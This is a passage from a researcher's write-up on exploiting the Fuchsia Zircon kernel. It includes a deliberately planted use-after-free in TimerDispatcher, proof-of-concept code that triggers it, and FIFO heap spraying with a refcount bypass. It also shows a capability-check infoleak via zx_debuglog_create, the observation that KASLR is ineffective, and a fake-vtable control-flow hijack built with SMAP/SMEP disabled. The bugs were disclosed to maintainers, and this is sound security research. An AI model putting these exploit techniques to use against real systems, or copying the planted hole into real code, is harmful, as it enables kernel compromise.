$./ffx-linux-x64 platform preflight It says that non-Debian distributions are not supported. However, I haven’t experienced any problems specific for Fedora 34. The tutorial also provides instructions for downloading the Fuchsia source code and setting up the environment variables. These commands build Fuchsia’s workstation product with developer tools for x86_64: $ fx clean
$fx set workstation.x64 --with-base //bundles:tools$ fx build

After building Fuchsia OS, you can start it in FEMU (Fuchsia emulator). FEMU is based on the Android Emulator (AEMU), which is a fork of QEMU.

$fx vdl start -N ## Creating a new component Let’s create a “hello world” application for Fuchsia. As I mentioned earlier, Fuchsia applications and programs are called components. This command creates a template for a new component: $ fx create component --path src/a13x-pwns-fuchsia --lang cpp

I want this component to print “hello” to the Fuchsia log:

#include <iostream>

int main(int argc, const char** argv)
{
std::cout << "Hello from a13x, Fuchsia!\n";
return 0;
}

The component manifest src/a13x-pwns-fuchsia/meta/a13x_pwns_fuchsia.cml should have this part to allow stdout logging:

program: {
// Use the built-in ELF runner.
runner: "elf",

// The binary to run for this component.
binary: "bin/a13x-pwns-fuchsia",

// Enable stdout logging
forward_stderr_to: "log",
forward_stdout_to: "log",
},

These commands build Fuchsia with a new component:

$fx set workstation.x64 --with-base //bundles:tools --with-base //src/a13x-pwns-fuchsia$ fx build

When Fuchsia with the new component is built, we can test it:

1. Start FEMU with Fuchsia using the command fx vdl start -N in the first terminal on the host system
2. Start Fuchsia package publishing server using the command fx serve in the second terminal on the host system
3. Show Fuchsia logs using the command fx log in the third terminal on the host system
4. Start the new component using the ffx tool in the fourth terminal on the host system:
 $ffx component run fuchsia-pkg://fuchsia.com/a13x-pwns-fuchsia#meta/a13x_pwns_fuchsia.cm --recreate In this screenshot (click to zoom in) we see that Fuchsia resolved the component by URL, downloaded and started it. Then the component printed Hello from a13x, Fuchsia! to the Fuchsia log in the third terminal. ## Zircon kernel development workflow Now let’s focus on the Zircon kernel development workflow. The Zircon source code in C++ is a part of the Fuchsia source code. Residing in the zircon/kernel subdirectory, it is compiled when Fuchsia OS is built. Zircon development and debugging requires running it in QEMU using the fx qemu -N command. However, when I tried it I got an error: $ fx qemu -N
Building multiboot.bin, fuchsia.zbi, obj/build/images/fuchsia/fuchsia/fvm.blk
ninja: Entering directory /home/a13x/develop/fuchsia/src/fuchsia/out/default'
ninja: no work to do.
ERROR: Could not extend FVM, unable to stat FVM image out/default/obj/build/images/fuchsia/fuchsia/fvm.blk

I discovered that this fault happens on machines that have a non-English console locale. This bug has been known for a long time. I have no idea why the fix hasn’t been merged yet. With this patch Fuchsia OS successfully starts on a QEMU/KVM virtual machine:

diff --git a/tools/devshell/lib/fvm.sh b/tools/devshell/lib/fvm.sh
index 705341e482c..5d1c7658d34 100644
--- a/tools/devshell/lib/fvm.sh
+++ b/tools/devshell/lib/fvm.sh
@@ -35,3 +35,3 @@ function fx-fvm-extend-image {
fi
-  stat_output=$(stat "${stat_flags[@]}" "${fvmimg}") + stat_output=$(LC_ALL=C stat "${stat_flags[@]}" "${fvmimg}")
if [[ "$stat_output" =~ Size:\ ([0-9]+) ]]; then Running Fuchsia in QEMU/KVM enables debugging of the Zircon microkernel with GDB. Let’s see that in action. 1. Start Fuchsia with this command: $ fx qemu -N -s 1 --no-kvm -- -s
• The -s 1 argument specifies the number of virtual CPUs for this virtual machine. Having a single virtual CPU makes the debugging experience better.
• The --no-kvm argument is useful if you need single-stepping during the debugging session. Otherwise KVM interrupts break the workflow and Fuchsia gets into the interrupt handler after each stepi or nexti GDB command. However, running Fuchsia VM without KVM virtualization support is much slower.
• The -s argument at the end of the command opens a gdbserver on TCP port 1234.

2. Allow execution of the Zircon GDB script, which provides several things:

• KASLR relocation for GDB, which is needed for setting breakpoints correctly.
• Special GDB commands with a zircon prefix.
• Pretty-printers for Zircon objects (none at the moment, alas).
• Enhanced unwinder for Zircon kernel faults.
$cat ~/.gdbinit add-auto-load-safe-path /home/a13x/develop/fuchsia/src/fuchsia/out/default/kernel_x64/zircon.elf-gdb.py 3. Start the GDB client and attach to the GDB server of Fuchsia VM: $ cd /home/a13x/develop/fuchsia/src/fuchsia/out/default/
$gdb kernel_x64/zircon.elf (gdb) target extended-remote :1234 This procedure is for debugging Zircon with GDB. On my machine, however, the Zircon GDB script completely hanged on each start and I had to debug this script. I found out that it calls the add-symbol-file GDB command with the -readnow parameter, which requires reading the entire symbol file immediately. For some reason, GDB was unable to chew symbols from the 110MB Zircon binary within a reasonable time. Removing this option fixed the bug on my machine and allowed normal Zircon debugging (click on the GDB screenshot to zoom in): diff --git a/zircon/kernel/scripts/zircon.elf-gdb.py b/zircon/kernel/scripts/zircon.elf-gdb.py index d027ce4af6d..8faf73ba19b 100644 --- a/zircon/kernel/scripts/zircon.elf-gdb.py +++ b/zircon/kernel/scripts/zircon.elf-gdb.py @@ -798,3 +798,3 @@ def _offset_symbols_and_breakpoints(kernel_relocated_base=None): # Reload the ELF with all sections set - gdb.execute("add-symbol-file \"%s\" 0x%x -readnow %s" \ + gdb.execute("add-symbol-file \"%s\" 0x%x %s" \ % (sym_path, text_addr, " ".join(args)), to_string=True) ## Getting closer to Fuchsia security: enable KASAN KASAN (Kernel Address SANitizer) is a runtime memory debugger designed to find out-of-bounds accesses and use-after-free bugs. Fuchsia supports compiling the Zircon microkernel with KASAN. For this experiment I built the Fuchsia core product: $ fx set core.x64 --with-base //bundles:tools --with-base //src/a13x-pwns-fuchsia --variant=kasan
$fx build For testing KASAN I added a synthetic bug to the Fuchsia code working with the TimerDispatcher object: diff --git a/zircon/kernel/object/timer_dispatcher.cc b/zircon/kernel/object/timer_dispatcher.cc index a83b750ad4a..14535e23ca9 100644 --- a/zircon/kernel/object/timer_dispatcher.cc +++ b/zircon/kernel/object/timer_dispatcher.cc @@ -184,2 +184,4 @@ void TimerDispatcher::OnTimerFired() { + bool uaf = false; + { @@ -187,2 +189,6 @@ void TimerDispatcher::OnTimerFired() { + if (deadline_ % 100000 == 31337) { + uaf = true; + } + if (cancel_pending_) { @@ -210,3 +216,3 @@ void TimerDispatcher::OnTimerFired() { // ourselves. - if (Release()) + if (Release() || uaf) delete this; As you can see, if the timer deadline value ends with 31337, then the TimerDispatcher object is freed regardless of the refcount value. I wanted to hit this kernel bug from the userspace component to see the KASAN error report. That is the code I added to my a13x-pwns-fuchsia component:  zx_status_t status; zx_handle_t timer; zx_time_t deadline; status = zx_timer_create(ZX_TIMER_SLACK_LATE, ZX_CLOCK_MONOTONIC, &timer); if (status != ZX_OK) { printf("[-] creating timer failed\n"); return 1; } printf("[+] timer is created\n"); deadline = zx_deadline_after(ZX_MSEC(500)); deadline = deadline - deadline % 100000 + 31337; status = zx_timer_set(timer, deadline, 0); if (status != ZX_OK) { printf("[-] setting timer failed\n"); return 1; } printf("[+] timer is set with deadline %ld\n", deadline); fflush(stdout); zx_nanosleep(zx_deadline_after(ZX_MSEC(800))); // timer fired zx_timer_cancel(timer); // hit UAF Here the zx_timer_create() syscall is called. It initializes the timer handle of a new timer object. Then this program sets the timer deadline to the magic value that ends with 31337. While this program waits on zx_nanosleep(), Zircon deletes the fired timer. The following zx_timer_cancel() syscall for the deleted timer provokes use-after-free. So executing this userspace component crashed the Zircon kernel and delivered a lovely KASAN report. Nice, KASAN works! Quoting the relevant parts: ZIRCON KERNEL PANIC UPTIME: 17826ms, CPU: 2 ... KASAN detected a write error: ptr={{{data:0xffffff806cd31ea8}}}, size=0x4, caller: {{{pc:0xffffffff003c169a}}} Shadow memory state around the buggy address 0xffffffe00d9a63d5: 0xffffffe00d9a63c0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xffffffe00d9a63c8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xffffffe00d9a63d0: 0xfa 0xfa 0xfa 0xfa 0xfd 0xfd 0xfd 0xfd ^^ 0xffffffe00d9a63d8: 0xfd 0xfd 0xfd 0xfd 0xfd 0xfd 0xfd 0xfd 0xffffffe00d9a63e0: 0xfd 0xfd 0xfd 0xfd 0xfd 0xfd 0xfd 0xfd *** KERNEL PANIC (caller pc: 0xffffffff0038910d, stack frame: 0xffffff97bd72ee70): ... Halted entering panic shell loop !  Zircon also prints the crash backtrace as a chain of some obscure kernel addresses. To make it human-readable, I had to process it with a special Fuchsia tool: $ cat crash.txt | fx symbolize > crash_sym.txt

Here’s how the backtrace looks after fx symbolize:

dso: id=58d07915d755d72e base=0xffffffff00100000 name=zircon.elf
#0    0xffffffff00324b7d in platform_specific_halt(platform_halt_action, zircon_crash_reason_t, bool) ../../zircon/kernel/platform/pc/power.cc:154 <kernel>+0xffffffff80324b7d
#1    0xffffffff005e4610 in platform_halt(platform_halt_action, zircon_crash_reason_t) ../../zircon/kernel/platform/power.cc:65 <kernel>+0xffffffff805e4610
#2.1  0xffffffff0010133e in $anon::PanicFinish() ../../zircon/kernel/top/debug.cc:59 <kernel>+0xffffffff8010133e #2 0xffffffff0010133e in panic(const char*) ../../zircon/kernel/top/debug.cc:92 <kernel>+0xffffffff8010133e #3 0xffffffff0038910d in asan_check(uintptr_t, size_t, bool, void*) ../../zircon/kernel/lib/instrumentation/asan/asan-poisoning.cc:180 <kernel>+0xffffffff8038910d #4.4 0xffffffff003c169a in std::__2::__cxx_atomic_fetch_add<int>(std::__2::__cxx_atomic_base_impl<int>*, int, std::__2::memory_order) ../../prebuilt/third_party/clang/linux-x64/include/c++/v1/atomic:1002 <kernel>+0xffffffff803c169a #4.3 0xffffffff003c169a in std::__2::__atomic_base<int, true>::fetch_add(std::__2::__atomic_base<int, true>*, int, std::__2::memory_order) ../../prebuilt/third_party/clang/linux-x64/include/c++/v1/atomic:1686 <kernel>+0xffffffff803c169a #4.2 0xffffffff003c169a in fbl::internal::RefCountedBase<true>::AddRef(const fbl::internal::RefCountedBase<true>*) ../../zircon/system/ulib/fbl/include/fbl/ref_counted_internal.h:39 <kernel>+0xffffffff803c169a #4.1 0xffffffff003c169a in fbl::RefPtr<Dispatcher>::operator=(const fbl::RefPtr<Dispatcher>&, fbl::RefPtr<Dispatcher>*) ../../zircon/system/ulib/fbl/include/fbl/ref_ptr.h:89 <kernel>+0xffffffff803c169a #4 0xffffffff003c169a in HandleTable::GetDispatcherWithRightsImpl<TimerDispatcher>(HandleTable*, zx_handle_t, zx_rights_t, fbl::RefPtr<TimerDispatcher>*, zx_rights_t*, bool) ../../zircon/kernel/object/include/object/handle_table.h:243 <kernel>+0xffffffff803c169a #5.2 0xffffffff003d3f02 in HandleTable::GetDispatcherWithRights<TimerDispatcher>(HandleTable*, zx_handle_t, zx_rights_t, fbl::RefPtr<TimerDispatcher>*, zx_rights_t*) ../../zircon/kernel/object/include/object/handle_table.h:108 <kernel>+0xffffffff803d3f02 #5.1 0xffffffff003d3f02 in HandleTable::GetDispatcherWithRights<TimerDispatcher>(HandleTable*, zx_handle_t, zx_rights_t, fbl::RefPtr<TimerDispatcher>*) ../../zircon/kernel/object/include/object/handle_table.h:116 <kernel>+0xffffffff803d3f02 #5 0xffffffff003d3f02 in sys_timer_cancel(zx_handle_t) ../../zircon/kernel/lib/syscalls/timer.cc:67 <kernel>+0xffffffff803d3f02 #6.2 0xffffffff003e1ef1 in λ(const wrapper_timer_cancel::(anon class)*, ProcessDispatcher*) gen/zircon/vdso/include/lib/syscalls/kernel-wrappers.inc:1170 <kernel>+0xffffffff803e1ef1 #6.1 0xffffffff003e1ef1 in do_syscall<(lambda at gen/zircon/vdso/include/lib/syscalls/kernel-wrappers.inc:1169:85)>(uint64_t, uint64_t, bool (*)(uintptr_t), wrapper_timer_cancel::(anon class)) ../../zircon/kernel/lib/syscalls/syscalls.cc:106 <kernel>+0xffffffff803e1ef1 #6 0xffffffff003e1ef1 in wrapper_timer_cancel(SafeSyscallArgument<unsigned int, true>::RawType, uint64_t) gen/zircon/vdso/include/lib/syscalls/kernel-wrappers.inc:1169 <kernel>+0xffffffff803e1ef1 #7 0xffffffff005618e8 in gen/zircon/vdso/include/lib/syscalls/kernel.inc:1103 <kernel>+0xffffffff805618e8 You can see that the wrapper_timer_cancel() syscall handler calls sys_timer_cancel(), where GetDispatcherWithRightsImpl<TimerDispatcher>() works with a reference counter and performs use-after-free. This memory access error is detected in asan_check(), which calls panic(). This backtrace helped me to understand how the C++ code of the sys_timer_cancel() function actually works: // zx_status_t zx_timer_cancel zx_status_t sys_timer_cancel(zx_handle_t handle) { auto up = ProcessDispatcher::GetCurrent(); fbl::RefPtr<TimerDispatcher> timer; zx_status_t status = up->handle_table().GetDispatcherWithRights(handle, ZX_RIGHT_WRITE, &timer); if (status != ZX_OK) return status; return timer->Cancel(); } When I got Fuchsia OS working with KASAN, I felt confident and ready for the security research. ## Syzkaller for Fuchsia (is broken) After studying the basics of the Fuchsia kernel development workflow, I decided to start the security research. For experiments with Fuchsia kernel security, I needed a Zircon bug for developing a PoC exploit. The simplest way to achieve that was fuzzing. There is a great coverage-guided kernel fuzzer called syzkaller. I’m fond of this project and its team, and I like to use it for fuzzing the Linux kernel. The syzkaller documentation says that it supports fuzzing Fuchsia, so I tried it in the first place. However, I ran into trouble due to the unusual software delivery on Fuchsia, which I described earlier. A Fuchsia image for fuzzing must contain syz-executor as a component. syz-executor is a part of the syzkaller project that is responsible for executing the fuzzing input on a virtual machine. But I didn’t manage to build a Fuchsia image with this component. First, I tried building Fuchsia with external syzkaller source code, according to the syzkaller documentation: $ fx --dir "out/x64" set core.x64 \
--with-base "//bundles:tools" \
--with-base "//src/testing/fuzzing/syzkaller" \
ERROR at //build/go/go_library.gni:43:3 (//build/toolchain:host_x64): Assertion failed.
assert(defined(invoker.sources), "sources is required for go_library")
^-----
sources is required for go_library
See //src/testing/fuzzing/syzkaller/BUILD.gn:106:3: whence it was called.
go_library("syzkaller-go") {
^---------------------------
See //src/testing/fuzzing/syzkaller/BUILD.gn:85:5: which caused the file to be included.
":run-sysgen($host_toolchain)", ^----------------------------- ERROR: error running gn gen: exit status 1 It looks like the build system doesn’t handle the syzkaller_dir argument properly. I tried to remove this assertion and debug the Fuchsia build system, but I failed. Then I found the third_party/syzkaller/ subdirectory in the Fuchsia source code. It contains a local copy of syzkaller sources that is used for building without --args=syzkaller_dir. But it’s quite an old copy: the last commit is from June 2, 2020. Building the current Fuchsia with this old version of syzkaller failed as well because of a number of changes in Fuchsia syscalls, header file locations, and so on. I tried one more time and updated syzkaller in the third_party/syzkaller/ subdirectory. But building didn’t work because the Fuchsia BUILD.gn file for syzkaller needed a substantial rewriting according to the syzkaller changes. In short, Fuchsia was integrated with the syzkaller kernel fuzzer once in 2020, but currently this integration is broken. I looked at the Fuchsia version control system to find Fuchsia developers who committed to this functionality. I wrote them an email describing all technical details of this bug, but didn’t get a reply. Spending more time on the Fuchsia build system was stressing me out. ## Thoughts on the research strategy I reflected on my strategy of the further research. Without fuzzing, successful vulnerability discovery in an OS kernel requires: 1. Good knowledge of its codebase 2. Deep understanding of its attack surface Getting this experience with Fuchsia would require a lot of my time. Did I want to spend a lot of time on my first Fuchsia research? Perhaps not, because: • Committing large resources to the first familiarity with the system is not reasonable • Fuchsia turned out to be less production-ready than I expected So I decided to postpone searching for zero-day vulnerabilities in Zircon and try to develop a PoC exploit for the synthetic bug that I had used for testing KASAN. Ultimately, that was a good decision because it gave me quick results and allowed to find other Zircon vulnerabilities along the way. ## Discovering a heap spraying exploit primitive for Zircon So I focused on exploiting use-after-free for TimerDispatcher. My exploitation strategy was simple: overwrite the freed TimerDispatcher object with the controlled data that would make the Zircon timer code work abnormally or, in other words, would turn this code into a weird machine. First of all, for overwriting TimerDispatcher, I needed to discover a heap spraying exploit primitive that: 1. Can be used by the attacker from the unprivileged userspace component 2. Makes Zircon allocate a new kernel object at the location of the freed object 3. Makes Zircon copy the attacker’s data from the userspace to this new kernel object I knew from my Linux kernel experience that heap spraying is usually constructed using inter-process communication (IPC). Basic IPC syscalls are usually available for unprivileged programs, according to paragraph 1. They copy userspace data to the kernelspace to transfer it to the recipient, according to paragraph 3. And finally, some IPC syscalls set the data size for the transfer, which gives control over the kernel allocator behavior and allows the attacker to overwrite the target freed object, according to paragraph 2. That’s why I started to study the Zircon syscalls responsible for IPC. I found Zircon FIFO, which turned out to be an excellent heap spraying primitive. When the zx_fifo_create() syscall is called, Zircon creates a pair of FifoDispatcher objects (see the code in zircon/kernel/object/fifo_dispatcher.cc). Each of them allocates the required amount of kernel memory for the FIFO data:  auto data0 = ktl::unique_ptr<uint8_t[]>(new (&ac) uint8_t[count * elemsize]); if (!ac.check()) return ZX_ERR_NO_MEMORY; KernelHandle fifo0(fbl::AdoptRef( new (&ac) FifoDispatcher(ktl::move(holder0), options, static_cast<uint32_t>(count), static_cast<uint32_t>(elemsize), ktl::move(data0)))); if (!ac.check()) return ZX_ERR_NO_MEMORY; With the debugger, I determined that the size of the freed TimerDispatcher object is 248 bytes. I assumed that for successful heap spraying I needed to create Zircon FIFOs of the same data size. This idea worked instantly: in GDB I saw that Zircon overwrote the freed TimerDispatcher with FifoDispatcher data! This is the code for the heap spraying in my PoC exploit:  printf("[!] do heap spraying...\n"); #define N 10 zx_handle_t out0[N]; zx_handle_t out1[N]; size_t write_result = 0; for (int i = 0; i < N; i++) { status = zx_fifo_create(31, 8, 0, &out0[i], &out1[i]); if (status != ZX_OK) { printf("[-] creating a fifo %d failed\n", i); return 1; } } Here the zx_fifo_create() syscall is executed 10 times. Each of them creates a pair of FIFOs that contain 31 elements. The size of each element is 8 bytes. So this code creates 20 FifoDispatcher objects with 248-byte data buffers. And here the Zircon FIFOs are filled with the heap spraying payload that is prepared for overwriting the freed TimerDispatcher object:  for (int i = 0; i < N; i++) { status = zx_fifo_write(out0[i], 8, spray_data, 31, &write_result); if (status != ZX_OK || write_result != 31) { printf("[-] writing to fifo 0-%d failed, error %d, result %zu\n", i, status, write_result); return 1; } status = zx_fifo_write(out1[i], 8, spray_data, 31, &write_result); if (status != ZX_OK || write_result != 31) { printf("[-] writing to fifo 1-%d failed, error %d, result %zu\n", i, status, write_result); return 1; } } printf("[+] heap spraying is finished\n"); Ok, I got the ability to change the TimerDispatcher object contents. But what to write into it to mount the attack? ## C++ object anatomy As a Linux kernel developer, I got used to C structures describing kernel objects. A method of a Linux kernel object is implemented as a function pointer stored in the corresponding C structure. This memory layout is explicit and simple. But the memory layout of C++ objects in Zircon looked much more complex and obscure to me. I tried to study the anatomy of the TimerDispatcher object and showed it in GDB using the command print -pretty on -vtbl on. The output was a big mess, and I didn’t manage to correlate it with the hexdump of this object. Then I tried the pahole utility for TimerDispatcher. It showed the offsets of the class members, but didn’t help with understanding how class methods are implemented. Class inheritance made the whole picture more complicated. I decided not to waste my time on studying TimerDispatcher object internals, but try blind practice instead. I used the FIFO heap spraying to overwrite the whole TimerDispatcher with zero bytes and saw what happened. Zircon crashed at the assertion in zircon/system/ulib/fbl/include/fbl/ref_counted_internal.h:57:  const int32_t rc = ref_count_.fetch_add(1, std::memory_order_relaxed); //... if constexpr (EnableAdoptionValidator) { ZX_ASSERT_MSG(rc >= 1, "count %d(0x%08x) < 1\n", rc, static_cast<uint32_t>(rc)); } No problem. I found that this refcount is stored at the 8-byte offset from the beginning of the TimerDispatcher object. To bypass this check, I set the corresponding bytes in the heap spraying payload:  unsigned int *refcount_ptr = (unsigned int *)&spray_data[8]; *refcount_ptr = 0x1337C0DE; Running this PoC on Fuchsia resulted in the next Zircon crash, which was very interesting from the attacker’s point of view. The kernel hit a null pointer dereference in HandleTable::GetDispatcherWithRights<TimerDispatcher>. Stepping through the instructions with GDB helped me to find out that this C++ dark magic causes Zircon to crash: // Dispatcher -> FooDispatcher template <typename T> fbl::RefPtr<T> DownCastDispatcher(fbl::RefPtr<Dispatcher>* disp) { return (likely(DispatchTag<T>::ID == (*disp)->get_type())) ? fbl::RefPtr<T>::Downcast(ktl::move(*disp)) : nullptr; } Here Zircon calls the get_type() public method of the TimerDispatcher class. This method is referenced using a C++ vtable. The pointer to the TimerDispatcher vtable is stored at the beginning of each TimerDispatcher object. It is great for control-flow hijacking. I would say it is simpler than similar attacks for the Linux kernel, where you need to search for appropriate kernel structures with function pointers. ## Zircon KASLR bypass Control-flow hijacking requires knowledge of kernel symbol addresses, which depend on the KASLR offset. KASLR stands for kernel address space layout randomization. The Zircon source code mentions KASLR many times. An example from zircon/kernel/params.gni:  # Virtual address where the kernel is mapped statically. This is the # base of addresses that appear in the kernel symbol table. At runtime # KASLR relocation processing adjusts addresses in memory from this base # to the actual runtime virtual address. if (current_cpu == "arm64") { kernel_base = "0xffffffff00000000" } else if (current_cpu == "x64") { kernel_base = "0xffffffff80100000" # Has KERNEL_LOAD_OFFSET baked into it. } For Fuchsia, I decided to implement a trick similar to my KASLR bypass for the Linux kernel. My PoC exploit for CVE-2021-26708 used the Linux kernel log for reading kernel pointers to mount the attack. The Fuchsia kernel log contains security-sensitive information as well. So I tried to read the Zircon log from my unprivileged userspace component. I added use: [ { protocol: "fuchsia.boot.ReadOnlyLog" } ] to the component manifest and opened the log with this code:  zx::channel local, remote; zx_status_t status = zx::channel::create(0, &local, &remote); if (status != ZX_OK) { fprintf(stderr, "Failed to create channel: %d\n", status); return -1; } const char kReadOnlyLogPath[] = "/svc/" fuchsia_boot_ReadOnlyLog_Name; status = fdio_service_connect(kReadOnlyLogPath, remote.release()); if (status != ZX_OK) { fprintf(stderr, "Failed to connect to ReadOnlyLog: %d\n", status); return -1; } zx_handle_t h; status = fuchsia_boot_ReadOnlyLogGet(local.get(), &h); if (status != ZX_OK) { fprintf(stderr, "ReadOnlyLogGet failed: %d\n", status); return -1; } First, this code creates a Fuchsia channel that will be used for the Fuchsia log protocol. Then it calls fdio_service_connect() for ReadOnlyLog and attaches the channel transport to it. These functions are from the fdio library, which provides a unified interface to a variety of Fuchsia resources: files, sockets, services, and others. Executing this code returns the error: [ffx-laboratory:a13x_pwns_fuchsia] WARNING: Failed to route protocol fuchsia.boot.ReadOnlyLog with target component /core/ffx-laboratory:a13x_pwns_fuchsia: A use from parent declaration was found at /core/ffx-laboratory:a13x_pwns_fuchsia for fuchsia.boot.ReadOnlyLog, but no matching offer declaration was found in the parent [ffx-laboratory:a13x_pwns_fuchsia] INFO: [!] try opening kernel log... [ffx-laboratory:a13x_pwns_fuchsia] INFO: ReadOnlyLogGet failed: -24 That is correct behavior. My component is unprivileged and there is no matching offer declaration of fuchsia.boot.ReadOnlyLog in the parent. No access is granted since this Fuchsia component doesn’t have the required capabilities. No way. So I dropped the idea of an infoleak from the kernel log. I started browsing through the Fuchsia source code and waiting for another insight. Suddenly I found another way to access the Fuchsia kernel log using the zx_debuglog_create() syscall: zx_status_t zx_debuglog_create(zx_handle_t resource, uint32_t options, zx_handle_t* out); The Fuchsia documentation says that the resource argument must have the resource kind ZX_RSRC_KIND_ROOT. My Fuchsia component doesn’t own this resource. Anyway, I tried using zx_debuglog_create() and… zx_handle_t root_resource; // global var initialized by 0 int main(int argc, const char** argv) { zx_status_t status; zx_handle_t debuglog; status = zx_debuglog_create(root_resource, ZX_LOG_FLAG_READABLE, &debuglog); if (status != ZX_OK) { printf("[-] can't create debuglog, no way\n"); return 1; } And this code worked! I managed to read the Zircon kernel log without the required capabilities and without the ZX_RSRC_KIND_ROOT resource. But why? I was amazed and found the Zircon code responsible for handling this syscall. Here’s what I found: zx_status_t sys_debuglog_create(zx_handle_t rsrc, uint32_t options, user_out_handle* out) { LTRACEF("options 0x%x\n", options); // TODO(fxbug.dev/32044) Require a non-INVALID handle. if (rsrc != ZX_HANDLE_INVALID) { // TODO(fxbug.dev/30918): finer grained validation zx_status_t status = validate_resource(rsrc, ZX_RSRC_KIND_ROOT); if (status != ZX_OK) return status; } A hilarious security check indeed! The Fuchsia bug report system for the issues 32044 and 30918 gave access denied. So I filed a security bug describing that sys_debuglog_create() has an improper capability check leading to a kernel infoleak. By the way, this issue tracker asked for the info in plain text, but by default it renders the report in Markdown (that’s weird, click the Markdown button to disable this behavior). The Fuchsia maintainers approved this issue and requested a CVE-2022-0882. ## Zircon KASLR: nothing to bypass As reading the Fuchsia kernel log was not a problem any more, I extracted some kernel pointers from it to bypass Zircon KASLR. I was amazed for a second time and laughed again. Despite KASLR, the kernel pointers were the same on every Fuchsia boot! See the examples of identical log output. Boot #1: [0.197] 00000:01029> INIT: cpu 0, calling hook 0xffffffff00263f20 (pmm_boot_memory) at level 0xdffff, flags 0x1 [0.197] 00000:01029> Free memory after kernel init: 8424374272 bytes. [0.197] 00000:01029> INIT: cpu 0, calling hook 0xffffffff00114040 (kernel_shell) at level 0xe0000, flags 0x1 [0.197] 00000:01029> INIT: cpu 0, calling hook 0xffffffff0029e300 (userboot) at level 0xe0000, flags 0x1 [0.200] 00000:01029> userboot: ramdisk 0x18c5000 @ 0xffffff8003bdd000 [0.201] 00000:01029> userboot: userboot rodata 0 @ [0x2ca730e3000,0x2ca730e9000) [0.201] 00000:01029> userboot: userboot code 0x6000 @ [0x2ca730e9000,0x2ca73100000) [0.201] 00000:01029> userboot: vdso/next rodata 0 @ [0x2ca73100000,0x2ca73108000) Boot #2: [0.194] 00000:01029> INIT: cpu 0, calling hook 0xffffffff00263f20 (pmm_boot_memory) at level 0xdffff, flags 0x1 [0.194] 00000:01029> Free memory after kernel init: 8424361984 bytes. [0.194] 00000:01029> INIT: cpu 0, calling hook 0xffffffff00114040 (kernel_shell) at level 0xe0000, flags 0x1 [0.194] 00000:01029> INIT: cpu 0, calling hook 0xffffffff0029e300 (userboot) at level 0xe0000, flags 0x1 [0.194] 00000:01029> userboot: ramdisk 0x18c5000 @ 0xffffff8003bdd000 [0.198] 00000:01029> userboot: userboot rodata 0 @ [0x2bc8b83c000,0x2bc8b842000) [0.198] 00000:01029> userboot: userboot code 0x6000 @ [0x2bc8b842000,0x2bc8b859000) [0.198] 00000:01029> userboot: vdso/next rodata 0 @ [0x2bc8b859000,0x2bc8b861000) The kernel pointers are the same. Zircon KASLR doesn’t work. I filed a security issue in the Fuchsia bug tracker (disable the Markdown mode to see it properly). The Fuchsia maintainers replied that this issue is known to them. Fuchsia OS turned out to be more experimental than I had expected. ## C++ vtables in Zircon After I realized that Fuchsia kernel functions have constant addresses, I started to study the vtables of Zircon C++ objects. I thought that constructing a fake vtable could enable control-flow hijacking. As I mentioned, the pointer to the corresponding vtable is stored at the beginning of the object. This is what GDB shows for a TimerDispatcher object: (gdb) info vtbl *(TimerDispatcher *)0xffffff802c5ae768 vtable for 'TimerDispatcher' @ 0xffffffff003bd11c (subobject @ 0xffffff802c5ae768): [0]: 0xffdffe64ffdffd24 [1]: 0xffdcb5a4ffe00454 [2]: 0xffdffea4ffdc7824 [3]: 0xffd604c4ffd519f4 ... The weird values like 0xffdcb5a4ffe00454 are definitely not kernel addresses. I looked at the code that works with the TimerDispatcher vtable: // Dispatcher -> FooDispatcher template <typename T> fbl::RefPtr<T> DownCastDispatcher(fbl::RefPtr<Dispatcher>* disp) { return (likely(DispatchTag<T>::ID == (*disp)->get_type())) ? fbl::RefPtr<T>::Downcast(ktl::move(*disp)) : nullptr; } This high-level C++ nightmare turns into the following simple assembly:  mov rax,QWORD PTR [r13+0x0] movsxd r11,DWORD PTR [rax+0x8] add r11,rax mov rdi,r13 call 0xffffffff0031a77c <__x86_indirect_thunk_r11> Here the r13 register stores the address of the TimerDispatcher object. The vtable pointer resides at the beginning of the object. So after the first mov instruction, the rax register stores the address of the vtable itself. Then the movsxd instruction moves the value 0xffdcb5a4ffe00454 from the vtable to the r11 register. But movsxd also sign-extends this value from a 32-bit source to a 64-bit destination. So 0xffdcb5a4ffe00454 turns into 0xffffffffffe00454. Then the vtable address is added to this value in r11, which forms the address of the TimerDispatcher method: (gdb) x$r11
0xffffffff001bd570 <_ZNK15TimerDispatcher8get_typeEv>:    0x000016b8e5894855

## Fake vtable for the win

Despite this weird pointer arithmetics in Zircon vtables, I decided to craft a fake TimerDispatcher object vtable to hijack the kernel control flow. That led me to the question of where to place my fake vtable. The simplest way is to create it in the userspace. However, Zircon on x86_64 supports SMAP (Supervisor Mode Access Prevention), which blocks access to the userspace data from the kernelspace.

In my Linux Kernel Defence Map, you can see SMAP among various mitigations of control-flow hijacking attacks in the Linux kernel.

I saw multiple ways to bypass SMAP protection by placing the fake vtable in the kernelspace.

1. For example, Zircon also has physmap like the Linux kernel, which makes the idea of the ret2dir attack for Zircon very promising.
2. Another idea was to use a kernel log infoleak of some kernel address that points to the data controlled by the attacker.

But to simplify my first security experiment with Fuchsia, I decided to disable SMAP and SMEP in the script starting QEMU and create the fake vtable in my exploit in the userspace:

#define VTABLE_SZ 16
unsigned long fake_vtable[VTABLE_SZ] = { 0 }; // global array

Then I made the exploit use this fake vtable in the heap spraying data that overwrite the TimerDispatcher object:

#define DATA_SZ 512
unsigned char spray_data[DATA_SZ] = { 0 };
unsigned long **vtable_ptr = (unsigned long **)&spray_data[0];

// Control-flow hijacking in DownCastDispatcher():
//   mov    rax,QWORD PTR [r13+0x0]
//   movsxd r11,DWORD PTR [rax+0x8]
//   mov    rdi,r13
//   call   0xffffffff0031a77c <__x86_indirect_thunk_r11>

*vtable_ptr = &fake_vtable[0]; // address in rax
fake_vtable[1] = (unsigned long)pwn - (unsigned long)*vtable_ptr; // value for DWORD PTR [rax+0x8]

This looks tricky, but fear not, you’ll like it!

Here the spray_data array stores the data for zx_fifo_write() overwriting TimerDispatcher. The vtable pointer resides at the beginning of the TimerDispatcher object, so vtable_ptr is initialized by the address of spray_data[0]. Then the address of the fake_vtable global array is written to the beginning of the spray_data. This address will appear in the rax register in DownCastDispatcher(), which I described above. The fake_vtable[1] element (or DWORD PTR [rax+0x8]) should store the value for calculating the function pointer of the TimerDispatcher.get_type() method. To calculate this value, I subtract the address of the fake vtable from the address of my pwn() function, which I’m going use to attack the Zircon kernel.

This is the magic that happens with the addresses when the exploit is executed. The real example:

